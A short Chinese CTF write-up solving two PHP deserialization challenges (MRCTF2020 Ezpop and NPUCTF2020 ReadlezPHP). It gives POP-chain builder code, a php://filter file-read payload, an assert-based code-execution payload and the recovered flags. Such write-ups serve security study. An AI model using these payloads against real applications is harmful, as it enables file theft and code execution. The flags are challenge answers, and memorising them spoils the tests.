反序列化
[MRCTF2020]Ezpop 简单的pop
查看源码
用反序列化触发wakeup方法,preg_match将$this->source进行字符串正则匹配,$show1会被当成字符串 进而触发tostring
tostring是把对象当成字符串调用时被触发,
$show = new Show();
$show1=new Show();
$show->source=$show1;
get方法是当访问一个不可访问的对象或方法时被触发
$test=new Test();
$show1->str=$test;
get方法被触发,$p被当成函数来调用,触发invoke方法
$modifier=new Modifier();
$test->p=$modifier;
invoke方法会调用append,append方法中有incloud,所以用伪协议来获取flag
<?php
class Modifier{
protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show{
public $source;
public $str;
}
class Test{
public $p;
}
$show = new Show();
$show1=new Show();
$show->source=$show1;
$test=new Test();
$show1->str=$test;
$modifier=new Modifier();
$test->p=$modifier;
echo urlencode(serialize($show));
运行
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BN%3B%7D%7D
在url中传参?pop
PD9waHAKY2xhc3MgRmxhZ3sKICAgIHByaXZhdGUgJGZsYWc9ICJmbGFne2Q3Mjg5MjQzLTkzMWEtNGU2OS1iNzIwLWYxYzYzYWVlZjY4NX0iOwp9CmVjaG8gIkhlbHAgTWUgRmluZCBGTEFHISI7Cj8+
Base64解码
<?php
class Flag{
private $flag= "flag{d7289243-931a-4e69-b720-f1c63aeef685}";
}
echo "Help Me Find FLAG!";
?>
[NPUCTF2020]ReadlezPHP 动态函数
查看源码,构造反序列化:echo serialize($c);
echo serialize($c);
O:8:"HelloPhp":2:{s:1:"a";s:11:"Y-m-d h:i:s";s:1:"b";s:4:"date";}
assert是用来避免显而易见的错误的
由$b($a) 可以构造$b=assert,$a=phpinfo ->assert(phpinfo())
$b=assert;
$a=phpinfo();
$d=assert(phpinfo());
echo serialize($d);
url传参
?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
在phpinfo页面中搜索得到flag